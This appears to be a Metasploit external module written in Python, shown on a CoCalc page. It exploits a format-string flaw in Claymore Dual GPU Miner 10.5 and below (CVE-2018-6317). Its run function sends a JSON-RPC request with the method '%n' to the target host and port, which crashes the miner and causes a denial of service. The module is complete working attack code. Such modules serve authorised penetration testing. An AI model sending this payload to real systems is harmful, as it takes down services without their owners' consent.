CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -
3

4

5
import socket
6
import json
7

8
from metasploit import module
9

10
metadata = {
11
    'name': 'Claymore Dual GPU Miner  Format String dos attack',
12

13
    'description': '''
14
    Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an
15
    unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing
16
    a denial of service.
17
    ''',
18

19
    'authors': [
20
        'res1n',  # Vulnerability disclosure
21
        'bluebird',  # Metasploit external module (Python)
22
    ],
23

24
    'date': '2018-02-06',
25

26
    'references': [
27
        {'type': 'cve', 'ref': '2018-6317'},
28
        {'type': 'edb', 'ref': '43972'},
29
        {'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
30
    ],
31

32
    'type': 'dos',
33
    'options': {
34
        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
35
        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 3333},
36
    }}
37

38

39
def run(args):
40
    host = args['rhost']
41
    port = int(args['rport'])
42
    module.log("Creating sockets...", 'info')
43

44
    exp = json.dumps({'id': 1, 'jsonrpc': '1.0', 'method': '%n'}).encode()
45
    try:
46
        s = socket.create_connection((host, port), 10)
47
        s.send(exp)
48
        s.close()
49
    except socket.error:
50
        module.log("connect error exit")
51

52

53
if __name__ == "__main__":
54
    module.run(metadata, run)
55

56